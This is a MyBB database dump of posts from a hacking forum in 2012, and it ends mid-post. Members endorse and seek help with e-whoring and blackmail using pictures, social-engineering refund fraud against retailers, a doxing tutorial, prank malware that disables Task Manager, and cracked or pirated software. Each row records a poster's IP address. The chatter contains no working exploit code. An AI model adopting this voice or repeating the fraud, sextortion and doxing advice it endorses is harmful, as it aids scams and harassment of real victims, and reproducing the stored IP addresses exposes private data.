INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('879', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '82', 'iTzIpod', '1345867916', 'So far, the website hasn\'t been offline! I\'m impressed. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a90254962fdccb5b823253690a1aaa22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('880', '203', '827', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345868199', '[quote=\'duhuh\' pid=\'827\' dateline=\'1345852212\'] yah first post, would love if you could help with razor? possibly thanks [/quote] I will try my best. =] Just PM me your Skype. And when I\'m available, I can give it a go.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd93efa70a28f96068358c98697b7db41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('881', '26', '718', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '82', 'iTzIpod', '1345868343', '[quote=\'t3h jok3r\' pid=\'718\' dateline=\'1345772070\'] [quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\'] I never tried E-Whoring before. :/ I want to try it! [/quote] Give it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s) [/quote] Them pedophiles ain\'t buying what I be selling. (They aren\'t giving me that crack.) :/ (Crack=Money) :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd28c865885f49811e78f5707f7290345', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('882', '217', '0', '24', '[Fun] Find the SEX of your Computer...!!', '0', '54', 'Sin Cara', '1345868433', '- open notepad - copy/paste [code]CreateObject(\"SAPI.SpVoice\" ).Speak\"I love YOU\"[/code] - save it (file > save as > love.vbs) - double-click it Mine is female guyyyyyzzzzzzzz its really funny..:roflol::roflol::roflol:', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '57b39420b35d50d2b958f0c40e1a875a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('883', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '112', '??????Z', '1345868707', 'would love to learn some SE. currently working on the amazon one but would also like to be taught properly by you. :)', '92.22.242.209', '1545007825', '0', '0', '112', '1345868730', '1', 'db5cddd9f8a95449c3edf37fe35fddd0', '0', '1345868730'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('884', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '82', 'iTzIpod', '1345868955', 'What kind of Monetizing eBooks and Hacking eBooks does this release contain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa7ac3e6a16b97de2e8a9c567b3a967c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('885', '218', '0', '34', 'NEFantasy\'s #1 Graphic Pack (2.15 GB)', '0', '82', 'iTzIpod', '1345869611', 'This is leaked straight from the thread. I do not take credit for this. All credits go to NEFantasy. ------------------------------------------------------------------- [url=http://adf.ly/CCyFn][img]http://i.minus.com/jl1OKkSa6Mvwk.png[/img][/url] Please inform that I forgot to put the credits in the pack (sorry) I\'ve putted them into the thread design and here: hackforums.net gfxforums.net planetrenders.net google.com deviantart.com sigtutorials.com siglabs.com Flashy +2 more Graphic sites (which I forgot)', '24.212.197.164', '416597412', '1', '0', '82', '1347719069', '1', '07f0a8bf3f8ce00b9665671993e1e8b7', '0', '1347719069'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('886', '203', '883', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345870221', '[quote=\'Kennerz\' pid=\'883\' dateline=\'1345868707\'] would love to learn some SE. currently working on the amazon one but would also like to be taught properly by you. :) [/quote] I recommend you see [url=http://l33thacking.com/showthread.php?tid=94] this[/url] first. And then, PM me your Skype so we can discuss things out. When I am not busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41fba1224bc135a29bfc77bbb8165a66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('887', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '112', '??????Z', '1345870364', 'was actually reading through that as you posted the reply ;). will pm now', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'ba622ed2ca8c06068ebfa9f5ffdb0142', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('888', '219', '0', '35', 'My Designs', '0', '82', 'iTzIpod', '1345871321', 'I\'m terrible at GFX. Yes I know, I\'m not good with text. Rate /10, CnC, Hate, Masturbate. Name: Bowser I followed a tutorial. [img]http://i.imgur.com/17fz4.jpg[/img] Name: Bored I followed a tutorial but changed it up a little to match my liking. [img]http://i.imgur.com/udd5t.jpg[/img] Also, [img]http://i.imgur.com/42ocw.jpg[/img] Name: Fail Metroid I followed a tutorial. But failed miserably because I rushed and was in a hurry. [img]http://i.imgur.com/7PJ31.png[/img] Name: Totodile! <3 I made this out of the blue. But I seem to like it! :D [img]http://i.imgur.com/kQFf9.png[/img] Name: Link I made this out of the blue. [img]http://i.imgur.com/2YNne.png[/img] ---------------------------------------------------------- Friend\'s Designs Nsme: Bumblebee Was made as a gift. I really like this one. [img]http://i.imgur.com/mmrzt.png[/img] Name: Green Apple Was made as a gift. I liked this one. I wanna learn how to make it! :o [img]http://i.imgur.com/0Chju.jpg[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345871658', '1', '31b2c25823bc5e9234e6bfa1eae8903e', '0', '1345871658'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('889', '40', '100', '17', 'RE: 600 pic ewhore pack', '0', '54', 'Sin Cara', '1345885573', 'please upload in mediafire.', '119.154.66.9', '2006598153', '1', '0', '0', '0', '1', '8093a42aa6eb814281c5cb59f27aa108', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('890', '212', '872', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1345898543', '[quote=\'Apathy\' pid=\'868\' dateline=\'1345865210\'] Yea dog I will make a group called sexy mofos an only you and me in it :3 [/quote] Seems to be interesting. [quote=\'Sin Cara\' pid=\'872\' dateline=\'1345867133\'] [b]Name of group:[/b] Forum Pro [b]Group Description:[/b] A group about forum discussion like MyBB, Vb, Ipb , Phpbb etc. [b]Group Userbar:[/b] [img]http://www.auplod.com/u/aodulp16a31.png[/img] [b]Forum Name:[/b] Official Group for forum makers [b]Forum Icon(34x34):[/b] [img]http://www.auplod.com/u/aupold16a32.png[/img] [b]Why LH should make this group official:[/b] Because its a unique and many members will love to join this ;) [/quote] Nice group, How about people that own a site with more than 10K posts or 1K members can join the group? Your choice, it\'s your group. I can only give suggestions and you can approve them.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '0169ba556f4c268843ac410cb32cc3e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('891', '210', '879', '3', 'RE: Moved Successfully!!!', '0', '1', 't3h jok3r', '1345898820', '[quote=\'Sin Cara\' pid=\'877\' dateline=\'1345867378\'] Best of luck for the the future of this wonderful community ;) [/quote] Thanks, we are going to need it. If we have iTzIpod, Sin Cara, NXK and Apathy then we will definitely become a popular forum soon. [quote=\'iTzIpod\' pid=\'879\' dateline=\'1345867916\'] So far, the website hasn\'t been offline! I\'m impressed. :o [/quote] Thanks and I also checked the downtime report and no downtime.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '042853e50bbd285267a0b8d81a46b5cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('892', '206', '862', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345898916', '[quote=\'iTzIpod\' pid=\'862\' dateline=\'1345863721\'] [quote=\'t3h jok3r\' pid=\'853\' dateline=\'1345858722\'] [quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\'] [quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\'] [quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\'] Thanks bro :D [/quote] No problem. You deserved it after all. [/quote] You gotta post a picture of yourself on the forum looking all swag just to receive the award? [/quote] We have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product. [/quote] Seems cool. Worth a shot! Might try it tomorrow. [/quote] No problem, Good Luck!', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '7faa80279731f362b0e4ff54f1505653', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('893', '43', '832', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345898932', '[quote=\'iTzIpod\' pid=\'832\' dateline=\'1345853213\'] [quote=\'t3h jok3r\' pid=\'810\' dateline=\'1345847940\'] [quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\'] I helped start it with you... :P [/quote] I remember this part and the time when I introduced you to Reborn. [quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\'] [quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\'] [quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\'] What? What do you mean took my username? :o [/quote] You said \"I\'m from t3h jok3r\" [/quote] Oh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP. [/quote] Lol now I get it ;) [/quote] Sorry for the mix up =] [/quote] No problem.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', 'ec44be2755ec2694d90a31864a0dcdc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('894', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345898969', '/me likes the cookie. Can I have more?', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '95145adead831af43471e5f516a566e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('895', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '119', 'Neal Caffrey', '1345899596', 'It didn\'t let me download any of them, but thanks for the gesture anyway!', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', '2e1ff2b7b1d5fddce4dcaed5a47a9398', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('896', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '119', 'Neal Caffrey', '1345899712', 'Haha, I can see how that would piss off people xD', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', '54b779589fcf7877000e078764a12ee4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('897', '152', '563', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '119', 'Neal Caffrey', '1345899801', '[quote=\'Sin Cara\' pid=\'563\' dateline=\'1345559898\'] [quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\'] Here\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url] You\'re welcome. [/quote] Thanks dude for virus scan ;) [/quote] It shows up as 1/41 for some reason... o.o Trojan? LOL.', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', 'b15dfb7d03018a12ad2b61e594ad75a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('898', '197', '894', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345900864', '[quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\'] * t3h jok3r likes the cookie. Can I have more? [/quote] /me slaps t3h jok3r with a fish for asking for more cookies without saying please. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0e5203551b4ed80ab92645901adcbcbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('899', '220', '0', '55', 'Windows 7 Ultimate', '0', '112', '??????Z', '1345901648', 'my computer is turning into a slow POS and i have been trying to track down a cracked version of windows 7 ultimate. all i have found so far either don\'t work or a pay to download. could someone help me out? thanks', '92.22.242.209', '1545007825', '0', '0', '112', '1345901675', '1', '209c6c61caa62e2cd37c9dd3bf10fcb8', '0', '1345901675'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('900', '221', '0', '7', 'L33t Hacking Advertisement Video', '0', '82', 'iTzIpod', '1345903215', '[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] So far, a lot of views in less than 24 hours! And a whooping 20+ Likes :o Credits: NXK I do not take any credit for this video. All credits go to NXK for making this. EDIT: I guess the [video][/video] doesn\'t work. :/', '24.212.197.164', '416597412', '1', '0', '82', '1345951883', '1', '9a50d03288fbd063282006c62ab0880c', '0', '1345951883'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('901', '134', '341', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345904080', 'Referred 4 members so far. Will be referring more!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '82db34704fd15412e30bee5712dee43d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('902', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '90', 'duhuh', '1345904194', 'i did think it loaded up very quickly just now, good job :)', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '30b5e00e784efbad6ea471c94f2359a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('903', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '90', 'duhuh', '1345904241', 'could i get this please? thanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c3e808bedb797d55402431651c4c424f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('904', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '53', 'sirchamp', '1345904744', 'Nice even tough the quality could be better.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'efb38d532df92b7ed580c66ea5349cb6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('905', '222', '0', '34', 'Music Man Signature Tutorial', '0', '82', 'iTzIpod', '1345905811', '[img]http://fc09.deviantart.net/fs24/f/2007/325/f/f/Music_Man_Signature_Tutorial_by_SH_Archaeologist.png[/img] Original Link: http://sh-archaeologist.deviantart.com/art/Music-Man-Signature-Tutorial-70326440 Credits: SH Archaeologist Enjoy~ Good luck making it!', '24.212.197.164', '416597412', '1', '0', '82', '1347719035', '1', 'd1c8588cd2f06368aa872b480ead3759', '0', '1347719035'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('906', '223', '0', '34', 'Versus Signature Tutorial', '0', '82', 'iTzIpod', '1345906030', '[img]http://fc04.deviantart.net/fs19/f/2007/303/d/b/Versus_Signature_Tutorial_by_thekellz.jpg[/img] Original Link: http://thekellz.deviantart.com/art/Versus-Signature-Tutorial-68632436 Credits: thekellz Good luck making this! Enjoy~', '24.212.197.164', '416597412', '1', '0', '82', '1347719040', '1', '367b854764ef02268fbfe159ae4ffde2', '0', '1347719040'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('907', '224', '0', '34', 'Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1345906134', '[img]http://fc04.deviantart.net/fs18/f/2007/146/7/9/Metroid_Signature_Tutorial_by_MPCoyote.jpg[/img] Original Link: http://mpcoyote.deviantart.com/art/Metroid-Signature-Tutorial-50490347 Credits: MPCoyote Enjoy~ Good luck making the signature!', '24.212.197.164', '416597412', '1', '0', '82', '1347719046', '1', '748a9e7b92ef59e90c714e4d93ca3c7d', '0', '1347719046'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('908', '152', '897', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345906537', '[quote=\'Neal Caffrey\' pid=\'897\' dateline=\'1345899801\'] [quote=\'Sin Cara\' pid=\'563\' dateline=\'1345559898\'] [quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\'] Here\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url] You\'re welcome. [/quote] Thanks dude for virus scan ;) [/quote] It shows up as 1/41 for some reason... o.o Trojan? LOL. [/quote] It\'s works fine for me and its not a virus.', '119.154.66.18', '2006598162', '1', '0', '0', '0', '1', '59de8dd71a27b713e27c91bf81f96931', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('909', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '54', 'Sin Cara', '1345906750', 'So are you going to make it official????', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '25dd3071ba57c3343b1845e680d25081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('910', '112', '903', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345906804', '[quote=\'duhuh\' pid=\'903\' dateline=\'1345904241\'] could i get this please? thanks [/quote] PPD ebooks pack is sent... check your pm now.', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '304551246fa90bf6f2175da82a53ab2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('911', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '116', '@SSASIN', '1345907886', 'Could i also receive your help please, thanks in advance. Skype- abdiz08', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', 'bbb5c248edda7735ac0092567b7e71ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('912', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '116', '@SSASIN', '1345908293', 'Good tutorial, why dont people who lie just use common sense. 1) Upright stance 2) Dont change subject 3) Dont change what you already said', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', '2a6aa4ea1152d80ef7361be84df68401', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('913', '186', '638', '16', 'RE: SE razor?', '0', '116', '@SSASIN', '1345908457', 'I also need the help, but I reckon Im going to buy the item for the PID and proof of purchase.', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', '504487bd9587b6c15fe7e3c2e64b373a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('914', '225', '0', '7', 'E-whoring Ebook very soon :)', '0', '54', 'Sin Cara', '1345908712', 'Just making an ebook on private e-whoring method.Using that method you will be able to make a lot of $$$. Also this ebook will not free for all members except [color=#FF0000]t3h jok3r[/color] as i trust him. Just posting this thread to know, who has interest in e-whoring. Regards Sin Cara', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '84d5e5160bf27148936449db929f8cdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('915', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '62', 'R?????zo?', '1345908744', 'I\'d love this but apparently I\'m too late :(', '89.214.202.231', '1507248871', '1', '0', '0', '0', '1', 'c94d444f2fb24b198102d4acce4f1d37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('916', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '48', 'BurnsH4X', '1345908751', 'its a very nice very fun to use and very easy also is funny to see the reaction of your brother freeing out as the gay p0rn opens and task manger is deactivated', '46.11.104.187', '772499643', '0', '0', '48', '1345984494', '1', 'cba6d4a576e708c485011cbde88de70d', '0', '1345984494'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('917', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '116', '@SSASIN', '1345909036', 'I also need some help, Ive Pmed you', '209.73.137.238', '-783709714', '0', '0', '0', '0', '1', 'aee873d72810ca019f39dca34bbd93cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('918', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '48', 'BurnsH4X', '1345909041', 'is there any working versions?', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', 'a88e4390888a25d9429ce62cd592ad0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('919', '226', '0', '11', 'A Newbies Guide', '0', '54', 'Sin Cara', '1345910367', '[color=#FFD700]Q: What is hacking?[/color] [color=#98FB98]A:[/color] The terms \"hack\" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term \"hacking\" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime [color=#FFD700] Q: What is cracking?[/color] [color=#98FB98]A:[/color] Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, 